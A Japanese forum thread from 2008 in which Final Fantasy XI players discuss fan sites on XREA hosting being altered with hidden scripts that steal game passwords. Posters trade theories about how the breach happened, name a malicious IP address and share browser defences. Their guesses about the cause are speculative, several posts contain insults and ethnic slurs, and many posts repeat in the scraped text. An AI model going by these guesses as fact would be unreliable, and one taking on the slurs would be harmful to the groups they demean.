460 :既にその名前は使われています:2008/08/09(土) 22:44:39 ID:eUF4xW0M
>>444
XREAは基本的に"無料鯖"のみというアナウンス。いやお金を払って広告をなくすプランもあるが
これはいわゆる『広告免除サービス(とおまけにサーバ容量増加とか)』という位置づけとされ、
一般に言う『有料サーバ』とは一線を画すのだと。デジロック(XREAの運営者)真正の有料サーバは
CoreServerって事だろうね。
ただ、昔は無料専用サーバと広告免除サーバが分かれていた気配もあったけど、無料でもすぐに
広告免除できるし、広告免除期間が切れれば無料アカウント扱いになるから、区別することは
実質意味はないかと。
ああ、もうひとつクラックの推理の根拠。同じ鯖番内でもクラックされているサイトとその気配が無い
サイトが存在する事。鯖上ファイルが改ざんされていたから為、先日話題になったさくらの
ARP spoofinでは無いだろう。
多分、クラック経路は、外部委託のためのシステムに穴があったとかだろう。
…先日CoreServer契約したばっかりなんだがな。
いや、今抱いている感情を口にするのは憚られるので、やめておこう。ああ、もう・・・。
XREAは基本的に"無料鯖"のみというアナウンス。いやお金を払って広告をなくすプランもあるが
これはいわゆる『広告免除サービス(とおまけにサーバ容量増加とか)』という位置づけとされ、
一般に言う『有料サーバ』とは一線を画すのだと。デジロック(XREAの運営者)真正の有料サーバは
CoreServerって事だろうね。
ただ、昔は無料専用サーバと広告免除サーバが分かれていた気配もあったけど、無料でもすぐに
広告免除できるし、広告免除期間が切れれば無料アカウント扱いになるから、区別することは
実質意味はないかと。
ああ、もうひとつクラックの推理の根拠。同じ鯖番内でもクラックされているサイトとその気配が無い
サイトが存在する事。鯖上ファイルが改ざんされていたから為、先日話題になったさくらの
ARP spoofinでは無いだろう。
多分、クラック経路は、外部委託のためのシステムに穴があったとかだろう。
…先日CoreServer契約したばっかりなんだがな。
いや、今抱いている感情を口にするのは憚られるので、やめておこう。ああ、もう・・・。
461 :既にその名前は使われています:2008/08/09(土) 22:52:51 ID:W8h0gMNp
「不正アクセス専用チャットサポート」はシステムメンテナンス作業の為、2008年8月11日(月)を臨時休業とさせていただきます。
ご不便をおかけいたしますが、不正アクセスに関するお問い合わせは翌日以降にお申し込みくださいますようお願いいたします。
「不正アクセス専用チャットサポート」はシステムメンテナンス作業の為、2008年8月11日(月)を臨時休業とさせていただきます。
ご不便をおかけいたしますが、不正アクセスに関するお問い合わせは翌日以降にお申し込みくださいますようお願いいたします。
ご不便をおかけいたしますが、不正アクセスに関するお問い合わせは翌日以降にお申し込みくださいますようお願いいたします。
「不正アクセス専用チャットサポート」はシステムメンテナンス作業の為、2008年8月11日(月)を臨時休業とさせていただきます。
ご不便をおかけいたしますが、不正アクセスに関するお問い合わせは翌日以降にお申し込みくださいますようお願いいたします。
462 :既にその名前は使われています:2008/08/10(日) 00:10:42 ID:szcGgUNB
また改ざんされてる別のサイトでたのか。
手口は前回同様、広告サーバクラック?
手口は前回同様、広告サーバクラック?
463 :既にその名前は使われています:2008/08/10(日) 00:12:51 ID:szcGgUNB
PCに対してわりと知識もってそうな奴でも垢ハックされていた。
沈静化の兆しが見えないが…。
沈静化の兆しが見えないが…。
464 :既にその名前は使われています:2008/08/10(日) 00:12:56 ID:YySDbD9n
465 :既にその名前は使われています:2008/08/10(日) 00:19:07 ID:0ek0HBKp
>>462
サイトのhtmlソースを直接改竄されている
(つまり管理者以外いじりようがないはずの部分が改変されている)
しかもフレーム形式の場合、ページが切り替わっても常時表示される部分を
狙って罠スクリプトを潜らせている
さらに対象がXREA限定となるとまたXREAに何らかのでっかい「穴」が開いて
そこ経由でやられてるんじゃないのかと想定
広告の時は広告サーバーの管理パスが外部委託先から第三者に漏れたのが原因だったそうだけど
漏れたのはひょっとしてそれだけじゃなかったんじゃないのかい?
サイトのhtmlソースを直接改竄されている
(つまり管理者以外いじりようがないはずの部分が改変されている)
しかもフレーム形式の場合、ページが切り替わっても常時表示される部分を
狙って罠スクリプトを潜らせている
さらに対象がXREA限定となるとまたXREAに何らかのでっかい「穴」が開いて
そこ経由でやられてるんじゃないのかと想定
広告の時は広告サーバーの管理パスが外部委託先から第三者に漏れたのが原因だったそうだけど
漏れたのはひょっとしてそれだけじゃなかったんじゃないのかい?
466 :既にその名前は使われています:2008/08/10(日) 00:25:18 ID:hnEx20lg
今のところ見る分には 最新のFlashPlayer JSオフ PG2で香港ブロックあたりで対策できそうです。
けどどのルートで改ざんされたのか不明なので 今後同じ手法でゼロデイ使われたら脅威ですねぇ。
XREAに移ったばかりなのにorz
発覚してるのは4サイトは FF XREAで検索すると上位に来るところばかりなので
そういうところが狙われたのか
時期的に帰省とか旅行してる人も多くて 発見が遅れてるのか気になるところです。
もし ピンポイントでハックできるなら リネ資料室さんなんか真っ先に狙われそうだけどRBLしてるんでしたっけか
けどどのルートで改ざんされたのか不明なので 今後同じ手法でゼロデイ使われたら脅威ですねぇ。
XREAに移ったばかりなのにorz
発覚してるのは4サイトは FF XREAで検索すると上位に来るところばかりなので
そういうところが狙われたのか
時期的に帰省とか旅行してる人も多くて 発見が遅れてるのか気になるところです。
もし ピンポイントでハックできるなら リネ資料室さんなんか真っ先に狙われそうだけどRBLしてるんでしたっけか
467 :既にその名前は使われています:2008/08/10(日) 00:28:05 ID:YySDbD9n
そういやマップガイドに連絡付けようとおもったら連絡先がどこにもないヨー
468 :既にその名前は使われています:2008/08/10(日) 00:29:55 ID:szcGgUNB
直接サイトのっとったわけか、ありがとう。XREAの無料サーバだめじゃん;
469 :既にその名前は使われています:2008/08/10(日) 00:31:08 ID:hnEx20lg
ああ 途中で送ってしまった。
クッキーのサーチしてるっぽいのも気になった
広告鯖クラックしたときに仕込をしてたか ネタ温存してたかって感じなのかなぁ。
こまったにゃー;;
クッキーのサーチしてるっぽいのも気になった
広告鯖クラックしたときに仕込をしてたか ネタ温存してたかって感じなのかなぁ。
こまったにゃー;;
470 :既にその名前は使われています:2008/08/10(日) 00:33:07 ID:0ek0HBKp
>>463
今年に入ってから不正アクセス犯罪のタゲがどんどんオンラインゲーム関連に向かってきている
「おいしい餌場」として認識されてるから新しい手段が惜しみなく投下されているし、
月ごとの新種トロイ検出数では4月くらいからオンラインゲーム関連のものが上位独占。
手口は巧妙化かつ攻撃は激化してるのに、アンチウィルスのベンダーの対応は遅いし
「たかがゲーム」だからニュース的にも問題にならない。ユーザー間の危機意識も薄い。
こんなんで沈静化するわけがないっす
>>468
こないだのは「無料サービスに表示義務がある」広告が原因だったから「無料だめじゃん」だったけど
今回は改竄の原因がはっきりしない以上有料だからセフセフとも言えない状況
今年に入ってから不正アクセス犯罪のタゲがどんどんオンラインゲーム関連に向かってきている
「おいしい餌場」として認識されてるから新しい手段が惜しみなく投下されているし、
月ごとの新種トロイ検出数では4月くらいからオンラインゲーム関連のものが上位独占。
手口は巧妙化かつ攻撃は激化してるのに、アンチウィルスのベンダーの対応は遅いし
「たかがゲーム」だからニュース的にも問題にならない。ユーザー間の危機意識も薄い。
こんなんで沈静化するわけがないっす
>>468
こないだのは「無料サービスに表示義務がある」広告が原因だったから「無料だめじゃん」だったけど
今回は改竄の原因がはっきりしない以上有料だからセフセフとも言えない状況
471 :既にその名前は使われています:2008/08/10(日) 00:41:58 ID:9CVRfG4G
被害拡大させる気か?
「不正アクセス専用チャットサポート」臨時休業のお知らせ(8/11)
http://www.playonline.com/ff11/polnews/news13913.shtml
2008年8月11日(月)を臨時休業とさせていただきます。
不正アクセスも電話って事かな?繋がらなそう
「不正アクセス専用チャットサポート」臨時休業のお知らせ(8/11)
http://www.playonline.com/ff11/polnews/news13913.shtml
2008年8月11日(月)を臨時休業とさせていただきます。
不正アクセスも電話って事かな?繋がらなそう
472 :既にその名前は使われています:2008/08/10(日) 00:47:41 ID:IKGpaKiz
■e<ワールド移転にキャラ作成。業者さまのおかげで休業中も稼がせていただいてます^^v
473 :既にその名前は使われています:2008/08/10(日) 00:52:45 ID:qNKMSOcR
業者マジで氏ね!!!!!!!!!! ああ、垢ハックされますた。
474 :既にその名前は使われています:2008/08/10(日) 00:53:59 ID:hnEx20lg
そなんですよねー。
大事なことなので重複ですが書いておきます。
XREAには 有料サーバはないのです。
広告免除サービス=XREA+があるだけで 広告のあるサイトもXREA+のサイトも同じサーバに混在してます。
だから今回みたいな場合 広告がないから安心とは言えないんですよ。
広告が原因ならもっと多数のサイトが感染してるはずなんです。
FF XREAでぐぐった上位100くらいのサイトをNOSCRIPTが1039045744をはじくかで確認してみたんですけど
現状確認できなかったんですよね。
ネット便利さんは独自ドメインだし...
しかも バリュードメインでドメイン買えばもれなく無料サーバが使える仕様。
xrea.comドメインじゃなくても XREAサーバ上にあるサイトは大量にあるんです。
大事なことなので重複ですが書いておきます。
XREAには 有料サーバはないのです。
広告免除サービス=XREA+があるだけで 広告のあるサイトもXREA+のサイトも同じサーバに混在してます。
だから今回みたいな場合 広告がないから安心とは言えないんですよ。
広告が原因ならもっと多数のサイトが感染してるはずなんです。
FF XREAでぐぐった上位100くらいのサイトをNOSCRIPTが1039045744をはじくかで確認してみたんですけど
現状確認できなかったんですよね。
ネット便利さんは独自ドメインだし...
しかも バリュードメインでドメイン買えばもれなく無料サーバが使える仕様。
xrea.comドメインじゃなくても XREAサーバ上にあるサイトは大量にあるんです。
475 :既にその名前は使われています:2008/08/10(日) 01:03:26 ID:zMvjIhcW
>>468
サイトならまだ良い、おそらくサーバがのっとられているんじゃないかという疑い。
もっと悪い状況。
いま報告されているサイトでは共通に使われているCGIとかが見当たらない。いや、
あるのかもしれないが、だとしたって、既出例はサイトの分野が偏っている。CGIの脆弱性なら
基本的に満遍なく分散するはずなのに。
デジロックの外部委託員は多分、個人ユーザーのサーバ領域にアクセス及び操作できる筈
(以前対応を受けたときにそういう感触を受けた)。また、各サイトのコンパネにもアクセスできる
模様。つまり、外部委託員の為のシステムがやられたのであれば、おそらく確実に現在の
状況は実現できる。
だから、同じデジロック運営のXREAだけでなくCoreServerも下手するとその危険性があるかもしれない。
サイトならまだ良い、おそらくサーバがのっとられているんじゃないかという疑い。
もっと悪い状況。
いま報告されているサイトでは共通に使われているCGIとかが見当たらない。いや、
あるのかもしれないが、だとしたって、既出例はサイトの分野が偏っている。CGIの脆弱性なら
基本的に満遍なく分散するはずなのに。
デジロックの外部委託員は多分、個人ユーザーのサーバ領域にアクセス及び操作できる筈
(以前対応を受けたときにそういう感触を受けた)。また、各サイトのコンパネにもアクセスできる
模様。つまり、外部委託員の為のシステムがやられたのであれば、おそらく確実に現在の
状況は実現できる。
だから、同じデジロック運営のXREAだけでなくCoreServerも下手するとその危険性があるかもしれない。
476 :既にその名前は使われています:2008/08/10(日) 03:13:24 ID:4ln6dZHl
_,,..r'''""~~`''ー-.、
,,.r,:-‐'''"""~~`ヽ、:;:;:\
r"r ゝ、:;:ヽ
r‐-、 ,...,, |;;;;| ,,.-‐-:、 ヾ;:;ゝ
:i! i! |: : i! ヾ| r'"~~` :;: ::;",,-‐‐- `r'^!
! i!. | ;| l| ''"~~ 、 i' |
i! ヽ | | | ,.:'" 、ヽ、 !,ノ
ゝ `-! :| i! .:;: '~~ー~~'" ゙ヾ : : ::|
r'"~`ヾ、 i! i! ,,-ェェI二エフフ : : :::ノ~|`T <イエーイ、前屈見てるー?
,.ゝ、 r'""`ヽ、i! `:、 ー - '" :: : :/ ,/
!、 `ヽ、ー、 ヽ‐''"`ヾ、.....,,,,_,,,,.-‐'",..-'"
| \ i:" ) | ~`'''ー---―''"~
ヽ `'" ノ
,,.r,:-‐'''"""~~`ヽ、:;:;:\
r"r ゝ、:;:ヽ
r‐-、 ,...,, |;;;;| ,,.-‐-:、 ヾ;:;ゝ
:i! i! |: : i! ヾ| r'"~~` :;: ::;",,-‐‐- `r'^!
! i!. | ;| l| ''"~~ 、 i' |
i! ヽ | | | ,.:'" 、ヽ、 !,ノ
ゝ `-! :| i! .:;: '~~ー~~'" ゙ヾ : : ::|
r'"~`ヾ、 i! i! ,,-ェェI二エフフ : : :::ノ~|`T <イエーイ、前屈見てるー?
,.ゝ、 r'""`ヽ、i! `:、 ー - '" :: : :/ ,/
!、 `ヽ、ー、 ヽ‐''"`ヾ、.....,,,,_,,,,.-‐'",..-'"
| \ i:" ) | ~`'''ー---―''"~
ヽ `'" ノ
477 :既にその名前は使われています:2008/08/10(日) 03:38:19 ID:ics7zMgF
つーかいつまで犯罪者野放しにしておくんだよ
おりんぴっくとかやってる場合じゃないだろクソ天安門
おりんぴっくとかやってる場合じゃないだろクソ天安門
478 :既にその名前は使われています:2008/08/10(日) 03:44:11 ID:wIlg6aj9
しかし恐ろしいほどテレビで話題にしないな
そりゃ無知な層がPC買わなくなるだろうしな
そりゃ無知な層がPC買わなくなるだろうしな
479 :既にその名前は使われています:2008/08/10(日) 03:45:57 ID:0/52jFiX
たかがゲーム、ですし
480 :既にその名前は使われています:2008/08/10(日) 03:46:11 ID:CktaUYjG
要するに、今時点のFF関連サイトで危ないのは何処なんだ?
会話が専門的すぎてわからねーよ
・エレメン
・エフメモ
・ヴァナモン(ブログじゃないほう)
・Air's Museum
・ゴブリ
・FFレシピ
この辺の有名サイトで教えてくれ
会話が専門的すぎてわからねーよ
・エレメン
・エフメモ
・ヴァナモン(ブログじゃないほう)
・Air's Museum
・ゴブリ
・FFレシピ
この辺の有名サイトで教えてくれ
481 :既にその名前は使われています:2008/08/10(日) 03:47:45 ID:s0/RLGdA
FFの配信でLSメンが目の前でアカウントハック受けてる状況を見たがひどかったな…
一応アカウント停止要請までは配信者が代理で申請したけど処理が終わった時は既に宅配終わった後だった
他人事じゃないなって実感したわ
一応アカウント停止要請までは配信者が代理で申請したけど処理が終わった時は既に宅配終わった後だった
他人事じゃないなって実感したわ
482 :既にその名前は使われています:2008/08/10(日) 03:47:45 ID:stCy11L1
一番危ないのは自分で学ぼうという気の無い君の頭の中かな
483 :既にその名前は使われています:2008/08/10(日) 03:48:40 ID:bXR/r/++
先日再発行してもらったパスがもう使えなくなってた
一度もそのパスでPCからログインしていないからハッキングはありえないんだが
即パス変更しないといけなかったのかしら
一度もそのパスでPCからログインしていないからハッキングはありえないんだが
即パス変更しないといけなかったのかしら
484 :既にその名前は使われています:2008/08/10(日) 03:50:16 ID:CktaUYjG
ID:stCy11L1
何こいつ。自分で悦に浸ってるだけかよ。死ねよ糞業者が
何こいつ。自分で悦に浸ってるだけかよ。死ねよ糞業者が
485 :既にその名前は使われています:2008/08/10(日) 03:52:14 ID:5KsfBGvi
夏だなぁ
486 :既にその名前は使われています:2008/08/10(日) 03:53:21 ID:0/52jFiX
>>480
それがわかりゃ苦労しねー。
「危ないかもしれない、だけど自分はがんばって対策したから見ても大丈夫だろう」と
信じて閲覧してんだよ。
苦労しないでできる一番楽な対策は「Webみない」事しかない。
それがわかりゃ苦労しねー。
「危ないかもしれない、だけど自分はがんばって対策したから見ても大丈夫だろう」と
信じて閲覧してんだよ。
苦労しないでできる一番楽な対策は「Webみない」事しかない。
487 :既にその名前は使われています:2008/08/10(日) 03:55:31 ID:stCy11L1
夏だねぇ
488 :既にその名前は使われています:2008/08/10(日) 04:03:43 ID:w7DNmdaI
マスゴミに教えてやろうぜ
489 :既にその名前は使われています:2008/08/10(日) 04:04:42 ID:szcGgUNB
>>479
その言葉ってよく出来た隠れ蓑だよな。きれいに本質隠してるような気がする。
>>480
・エレメン…今の所平気。ただしここからリンク張られてるサイトやwikiで管理放棄気味の場所は注意。
・エフメモ…同上。
・ヴァナモン…同上。ブログは閉鎖済み。
・Air's Museum…同上。
・ゴブリ…同上。
・FFレシピ…サイト権利を買ったRMT業者が運営してる。白地図本舗も同様。
とりあえずPC2台目用意して、それでネットやるしか絶対といえない。
地図サイトとしていまハッキングされてるサイト使ってたんだけれど
ホント困るよなぁ。まぁ地図ならこのサイトにも載ってるけれど。
ttp://ff11db.sakura.ne.jp/database/top/index_map.html
その言葉ってよく出来た隠れ蓑だよな。きれいに本質隠してるような気がする。
>>480
・エレメン…今の所平気。ただしここからリンク張られてるサイトやwikiで管理放棄気味の場所は注意。
・エフメモ…同上。
・ヴァナモン…同上。ブログは閉鎖済み。
・Air's Museum…同上。
・ゴブリ…同上。
・FFレシピ…サイト権利を買ったRMT業者が運営してる。白地図本舗も同様。
とりあえずPC2台目用意して、それでネットやるしか絶対といえない。
地図サイトとしていまハッキングされてるサイト使ってたんだけれど
ホント困るよなぁ。まぁ地図ならこのサイトにも載ってるけれど。
ttp://ff11db.sakura.ne.jp/database/top/index_map.html
490 :既にその名前は使われています:2008/08/10(日) 04:26:27 ID:4AoqWpzf
htmlソースを直接改竄されてる時点でもうどこにも安全だといえるサイトは無い気がするがな
自分に知識が無いorウイルス対策などしてないなら「FF」に関係するような所は見るなとしかいえない
自分に知識が無いorウイルス対策などしてないなら「FF」に関係するような所は見るなとしかいえない
491 :既にその名前は使われています:2008/08/10(日) 04:28:40 ID:dNBfjtk8
>>482
さすがわかってる人は言葉に重みがありますね(笑)
俺の周りでもここ数日で5人もハックされてた
うち1人は普段PS2でやってるのに、たまたま友達の家でログインした時の
パスを抜かれてハックされたみたいで、悔やんでも悔やみきれんというか
さすがわかってる人は言葉に重みがありますね(笑)
俺の周りでもここ数日で5人もハックされてた
うち1人は普段PS2でやってるのに、たまたま友達の家でログインした時の
パスを抜かれてハックされたみたいで、悔やんでも悔やみきれんというか
492 :既にその名前は使われています:2008/08/10(日) 04:33:22 ID:Pw/UC7H7
ちょっと相談。
PG2いれてからいままではじいてきたのは韓国とかだけだったんだが
さっき履歴をみたら、金曜にリネ研究室さんの「MMOトロイ」のうちにある
pcutw69.64.155.132のとこに送信しようとしてブロックされてた履歴があった。
で、スキャンとかしたんだけど何も出てこない。
PC内に既にウィルスが入ってた可能性の他に
そのとき閲覧してたサイトに問題がある可能性もあると思うんだが
何のサイトみてたか思いだせない。
FF関連だと用語集とwikiぐらいしか普段は見ないんだが
最近は調度品グラ見たくて検索したかなとかいう記憶がある。
特定の日時にどのサイト見てたかとか調べる方法ありますか?
PG2いれてからいままではじいてきたのは韓国とかだけだったんだが
さっき履歴をみたら、金曜にリネ研究室さんの「MMOトロイ」のうちにある
pcutw69.64.155.132のとこに送信しようとしてブロックされてた履歴があった。
で、スキャンとかしたんだけど何も出てこない。
PC内に既にウィルスが入ってた可能性の他に
そのとき閲覧してたサイトに問題がある可能性もあると思うんだが
何のサイトみてたか思いだせない。
FF関連だと用語集とwikiぐらいしか普段は見ないんだが
最近は調度品グラ見たくて検索したかなとかいう記憶がある。
特定の日時にどのサイト見てたかとか調べる方法ありますか?
493 :既にその名前は使われています:2008/08/10(日) 04:34:43 ID:9g4tHL/n
やべぇ地図サイトってFF11・マップガイドのことかよ・・・
やっべーブログで「おすすめ^^」とか紹介しちまった・・・
やっべーブログで「おすすめ^^」とか紹介しちまった・・・
494 :既にその名前は使われています:2008/08/10(日) 04:38:09 ID:szcGgUNB
495 :既にその名前は使われています:2008/08/10(日) 04:38:56 ID:4AoqWpzf
496 :既にその名前は使われています:2008/08/10(日) 04:40:46 ID:HxpB07+a
>>492
つかってるブラウザが何かによるけど、履歴みれたりしない?
つかってるブラウザが何かによるけど、履歴みれたりしない?
497 :既にその名前は使われています:2008/08/10(日) 04:52:15 ID:Pw/UC7H7
>496
書き忘れた、ごめん。火狐で、履歴欄から最後の表示日時だせるね、ありがとう
書き忘れた、ごめん。火狐で、履歴欄から最後の表示日時だせるね、ありがとう
498 :既にその名前は使われています:2008/08/10(日) 04:56:39 ID:Pw/UC7H7
で、探してみたら、FFと「まったく」関係のない趣味の携帯サイト?で
69.64.155.132をブロックしてるんだがww
69.64.155.132をブロックしてるんだがww
499 :既にその名前は使われています:2008/08/10(日) 04:57:34 ID:Zto8vCIZ
広告じゃねーの?
500 :既にその名前は使われています:2008/08/10(日) 04:58:20 ID:Qny/eMLS
まぁついでに、IEだと「表示→エクスプローラーバー→履歴」で出ます
501 :既にその名前は使われています:2008/08/10(日) 05:07:14 ID:Pw/UC7H7
色々ありがとう。
広告ではなくてweb素材?を提供してるサイトっぽいんだが
なんでそこがMMOトロイと関係あるのかさっぱりわからん。
広告ではなくてweb素材?を提供してるサイトっぽいんだが
なんでそこがMMOトロイと関係あるのかさっぱりわからん。
502 :既にその名前は使われています:2008/08/10(日) 05:20:57 ID:lbYwARaR
広告Flashかiframeにでも仕込まれてたんだろ、って事だと思うが
Firefox使ってるならNoScriptとFlashblock入れてないってことは無いか。
プライバシ情報なんか終了時全消ししてたが・・・
履歴くらいは残した方が便利かもしれんな。
Firefox使ってるならNoScriptとFlashblock入れてないってことは無いか。
プライバシ情報なんか終了時全消ししてたが・・・
履歴くらいは残した方が便利かもしれんな。
503 :既にその名前は使われています:2008/08/10(日) 05:33:07 ID:Pw/UC7H7
NoScriptは入れてるー。
www★yamada03★org
なんだが、FFと関係なさそうだよなあ。
指定ドメイン => 「 yamada03★org 」
取得ホスト名 => yamada03★org
取得IPアドレス=> 69.64.155.132 (IPv4)
69.64.155.132がMMOトロイに指定されてる。
ブロック解除するのこわくて該当サイトみれないんだが、何なんだ。
www★yamada03★org
なんだが、FFと関係なさそうだよなあ。
指定ドメイン => 「 yamada03★org 」
取得ホスト名 => yamada03★org
取得IPアドレス=> 69.64.155.132 (IPv4)
69.64.155.132がMMOトロイに指定されてる。
ブロック解除するのこわくて該当サイトみれないんだが、何なんだ。
504 :既にその名前は使われています:2008/08/10(日) 05:34:19 ID:bXR/r/++
携帯からは見れないの?
505 :既にその名前は使われています:2008/08/10(日) 05:44:11 ID:Pw/UC7H7
そうっぽい。
506 :既にその名前は使われています:2008/08/10(日) 06:02:25 ID:YnMXnd5K
X激しく忍者 百三拾八ノ巻X
http://yy28.kakiko.com/test/read.cgi/ff11jobjobplus/1215269497/802
802 名前:天麩羅サイトの人 ◆iyCbVNINJA :08/08/10 02:15:24 ID:PSxsU/u/
とりあえず対処。
>>389
XREA 1039045744:88 の確認されたサイト
FF11・マップガイド(ネット便利)フッターテーブル内
黒魔協会:xml宣言の前
吟遊詩人テンプレ:メニュー ヘッダー 8/7 21:40対策済み
忍者スレテンプレ:メニュー </body>と</html>の間 8/10 2:15対策済み
http://yy28.kakiko.com/test/read.cgi/ff11jobjobplus/1215269497/802
802 名前:天麩羅サイトの人 ◆iyCbVNINJA :08/08/10 02:15:24 ID:PSxsU/u/
とりあえず対処。
>>389
XREA 1039045744:88 の確認されたサイト
FF11・マップガイド(ネット便利)フッターテーブル内
黒魔協会:xml宣言の前
吟遊詩人テンプレ:メニュー ヘッダー 8/7 21:40対策済み
忍者スレテンプレ:メニュー </body>と</html>の間 8/10 2:15対策済み
507 :既にその名前は使われています:2008/08/10(日) 06:40:01 ID:a/h7Gq9M
>>491
ここまで危険な状況だと、
友達の家、ネットカフェ、等でプレイしたら、家に帰って即パスワード変更は絶対必要だな。
たとえWEB見ないPCでプレイしてたとしても、1月ごとくらいにパスワード変えたいかも。
最悪の場合、今後ネットワーク内のどこかのPCでFF関連の感染サイト踏んだ場合、
同じグローバルアドレスにぶらさがってる家庭内LANのPC総当りで狙われる可能性が
無いとはいえない気が・・・
この世界、ピンポイントで狙われたら終わりってのは確かだしな;
ここまで危険な状況だと、
友達の家、ネットカフェ、等でプレイしたら、家に帰って即パスワード変更は絶対必要だな。
たとえWEB見ないPCでプレイしてたとしても、1月ごとくらいにパスワード変えたいかも。
最悪の場合、今後ネットワーク内のどこかのPCでFF関連の感染サイト踏んだ場合、
同じグローバルアドレスにぶらさがってる家庭内LANのPC総当りで狙われる可能性が
無いとはいえない気が・・・
この世界、ピンポイントで狙われたら終わりってのは確かだしな;
508 :既にその名前は使われています:2008/08/10(日) 06:47:26 ID:hXL3uta5
マップガイド、いつから改竄されていたんでしょうか
ある程度目安で分かる方いますか・・?
8/1〜3辺りで見てしまいました・・・
その時はPG2無反応だったけど、うちのPG2は今まで反応したことが無くて不安です(⊃Д`)
ある程度目安で分かる方いますか・・?
8/1〜3辺りで見てしまいました・・・
その時はPG2無反応だったけど、うちのPG2は今まで反応したことが無くて不安です(⊃Д`)
509 :既にその名前は使われています:2008/08/10(日) 06:52:17 ID:4GmPAcit
510 :既にその名前は使われています:2008/08/10(日) 06:55:48 ID:Zto8vCIZ
スクリプト切ってたなら感染してないんだからPG反応しなくて当然じゃないの?
まぁ、↑これだけで100%対策しきれてるとは言えないらしいが
まぁ、↑これだけで100%対策しきれてるとは言えないらしいが
511 :既にその名前は使われています:2008/08/10(日) 07:51:33 ID:m19NOlYw
盆前になにかしてくるだろうと思ってたけど、やっぱり来てたか
512 :既にその名前は使われています:2008/08/10(日) 08:00:11 ID:088l2Uxn
ps2でオンできないんだけどオイらだけ?
513 :既にその名前は使われています:2008/08/10(日) 08:16:10 ID:kQDk+RIP
>>512
まず100Vのコンセントを用意しろ
まず100Vのコンセントを用意しろ
514 :既にその名前は使われています:2008/08/10(日) 09:44:02 ID:0ek0HBKp
>>503
69.64.155.132は中華の危険ドメインmakgcat■comのグループ、pcutw■comと同一IP
そっちに反応したんじゃないのかい
「web素材?を提供してるサイトっぽい」っていうのは www■yamada03■orgにアクセスしたときに表示される
「welcome to yamada03■org」表示の下の「materiel〜」を指してるんだと思うんだけど
この手のおねーちゃんつき画面はドメイン失効したか失効→ドメイン名買い取られの対策として偽装indexとして貼ってるか
そのあたりで表示されるもんなのでサイトの中身とは全く関係無い
69.64.155.132は中華の危険ドメインmakgcat■comのグループ、pcutw■comと同一IP
そっちに反応したんじゃないのかい
「web素材?を提供してるサイトっぽい」っていうのは www■yamada03■orgにアクセスしたときに表示される
「welcome to yamada03■org」表示の下の「materiel〜」を指してるんだと思うんだけど
この手のおねーちゃんつき画面はドメイン失効したか失効→ドメイン名買い取られの対策として偽装indexとして貼ってるか
そのあたりで表示されるもんなのでサイトの中身とは全く関係無い
515 :既にその名前は使われています:2008/08/10(日) 10:26:42 ID:Pw/UC7H7
>514
わざわざありがとう
わざわざありがとう
516 :既にその名前は使われています:2008/08/10(日) 11:21:49 ID:MqepF7xe
もうユーザーが対処できる状態じゃないじゃんかw
pcこわくて使えないんですが。どこ開いてもあやしいじゃんかよ
pcこわくて使えないんですが。どこ開いてもあやしいじゃんかよ
517 :既にその名前は使われています:2008/08/10(日) 11:35:20 ID:0/52jFiX
518 :既にその名前は使われています:2008/08/10(日) 11:46:12 ID:ZwDS9S5C
思考停止に陥るなら、PCを使わない方が自分のためでもあるし、他人の為でもある。
519 :既にその名前は使われています:2008/08/10(日) 11:49:28 ID:pfUqWA94
ネ実にいるような奴は目くそ鼻くそwwwwwwwwwwwwwwwww
520 :既にその名前は使われています:2008/08/10(日) 11:52:36 ID:7teE2Z8P
単に愚痴を言っただけでここまでいわれるか
そこまで人間不信に陥らないと生きていけないわけ?社交辞令みたいなもんだよ
そこまで人間不信に陥らないと生きていけないわけ?社交辞令みたいなもんだよ
521 :既にその名前は使われています:2008/08/10(日) 12:15:20 ID:eMxppDxm
チョンゲーのが対応良いな
522 :既にその名前は使われています:2008/08/10(日) 12:21:06 ID:eMxppDxm
俺なんて2ヶ月も巻き戻ったからな
ハック時にLV75だったキャラが35になってたわ
流石にやる気なくなったぜ。クレカからWEBマネーに変更したし今月で引退予定
ハック時にLV75だったキャラが35になってたわ
流石にやる気なくなったぜ。クレカからWEBマネーに変更したし今月で引退予定
523 :既にその名前は使われています:2008/08/10(日) 12:43:53 ID:iM+nD6DF
2ヶ月は酷いなw
■は業者の垢売りに援護射撃してるようなものだな
■は業者の垢売りに援護射撃してるようなものだな
524 :既にその名前は使われています:2008/08/10(日) 13:02:30 ID:kQDk+RIP
対応遅いのはそれだけ被害者が多いってことなのかなぁ?
525 :既にその名前は使われています:2008/08/10(日) 13:03:36 ID:rTMJAFs0
そうだよw
526 :既にその名前は使われています:2008/08/10(日) 13:10:36 ID:sPPxPB21
これだけ多いと内部から漏れてる可能性もかなり高いな
527 :既にその名前は使われています:2008/08/10(日) 13:11:25 ID:vKl1bT0w
>「たかがゲーム」だからニュース的にも問題にならない。
>ユーザー間の危機意識も薄い。
なんという濡れ手に粟。
初期のオレオレ詐欺並に儲かりそうだ。
>ユーザー間の危機意識も薄い。
なんという濡れ手に粟。
初期のオレオレ詐欺並に儲かりそうだ。
528 :既にその名前は使われています:2008/08/10(日) 13:12:30 ID:rZ5ycPsk
被害額については、月額料金の1500円くらいってことだからなw
ニュースにも何にもなるはずがないw
ニュースにも何にもなるはずがないw
529 :既にその名前は使われています:2008/08/10(日) 13:12:36 ID:YySDbD9n
この前までは5分に一回パスが送信されてきてたっていうからな
中身に差異はあれど、他人の財布が5分に一回舞い込んできてるって考えると酷いもんだ
中身に差異はあれど、他人の財布が5分に一回舞い込んできてるって考えると酷いもんだ
530 :既にその名前は使われています:2008/08/10(日) 13:17:10 ID:8dByw3ZG
>>527
RMT自体はニュースになったし、不正アクセスもニュースになる事はあるし
盗用クレカとRMTのロンダリングの恐れとかもニュースになっているのにな。
やはり根幹に中国が絡んでいるからだろうか?
RMT自体はニュースになったし、不正アクセスもニュースになる事はあるし
盗用クレカとRMTのロンダリングの恐れとかもニュースになっているのにな。
やはり根幹に中国が絡んでいるからだろうか?
531 :既にその名前は使われています:2008/08/10(日) 13:22:01 ID:o7Oz2/IQ
>>528
クレカ支払いだと勝手に鯖移動もさせられてるらしいよ。
フルに新キャラ作られて不正な行為「すり抜け」「RMの受け渡し」に使われる事も多いらしい。
クレカ払いの奴は被害額5000円以上と見ておいた方がいい
クレカ支払いだと勝手に鯖移動もさせられてるらしいよ。
フルに新キャラ作られて不正な行為「すり抜け」「RMの受け渡し」に使われる事も多いらしい。
クレカ払いの奴は被害額5000円以上と見ておいた方がいい
532 :既にその名前は使われています:2008/08/10(日) 13:32:22 ID:p89+26ck
俺はクレカだったけど、鯖移動も削除、新キャラ作成等、無しだったよ。
7/5の大漁時だったから、とっとと次垢に行ったのかもね。
